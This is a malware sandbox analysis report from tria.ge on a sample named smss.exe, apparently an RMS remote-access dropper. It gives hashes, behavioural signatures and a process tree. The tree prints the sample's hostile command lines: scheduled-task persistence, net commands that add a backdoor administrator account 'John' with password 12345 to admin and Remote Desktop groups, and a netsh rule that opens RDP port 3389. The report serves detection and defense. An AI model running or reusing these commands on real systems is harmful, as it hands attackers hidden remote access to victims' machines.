Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
75s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
26/04/2024, 13:30
General
-
Target
smss.exe
-
Size
9.2MB
-
MD5
53b92442e012db2fc2ee7dc22ee932a9
-
SHA1
750d3f0ac227ccaa2c2a86859cffa4a2ac7cb1d1
-
SHA256
776217117d4b2ecdb07b8a182581e4fd562c0a5785340f86100cf5c1b4eff62e
-
SHA512
b64301d65f48f76855ad89723a933f6e25478ae3a5bcc35cbef81badd08d6dc565d41b51b46a9ab1ad750f0dfa81bffc3c4e6b3b5708f49fd937c948d674c430
-
SSDEEP
196608:uDL2f4ARa+Yw//FpKv45ZhxE5ckWxoUPTYC39SGVy32idMfeaq6p:2L2f4ARaat64fhuWxjBE2SMfeaq6p
Malware Config
Signatures
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Themida packer 14 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 1 IoCs
-
AutoIT Executable 12 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry class 3 IoCs
-
NTFS ADS 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 58 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\smss.exe"C:\Users\Admin\AppData\Local\Temp\smss.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet user John 12345 /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add4⤵
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i2⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
2KB
MD5d7c429c3e48b1edb695c9b661154d32e
SHA1e1397f226ebdd7f39fe800b4161066b4941e79b0
SHA2569a5e1ea29b6c7d101d133f9e5951d42af3c14c2222ec8883601040ff37fc4bd3
SHA512abb0c8207a19c81463d95f795e0795b63848f3eb8038f1ae3f1a0d3b9854694ffa11febe64f62d1de6d23ea60df18b92a974148e97411287b2d9c0fc5a79d225
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
315B
MD5155557517f00f2afc5400ba9dc25308e
SHA177a53a8ae146cf1ade1c9d55bbd862cbeb6db940
SHA256f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e
SHA51240baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
323KB
MD574353b471791f5d75f64bd0bf051b0e9
SHA1272ba026a029da8a356f4f1de596d09125895312
SHA256e33f6ea2f4e7ea1cf7ae5550eb0d2f4df3a8d7a77ca59b03219bab5a6d3021e9
SHA512666826808ccd649eca0418b12afc62a2f7176d50b5e6e39cedda3aa1e24b6a8c686b8d2efcc2022310ef94b991172343cfcd45fef089e841619a61067fa28a13
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
2.0MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
15.6MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
10.2MB
-
Filesize
1.4MB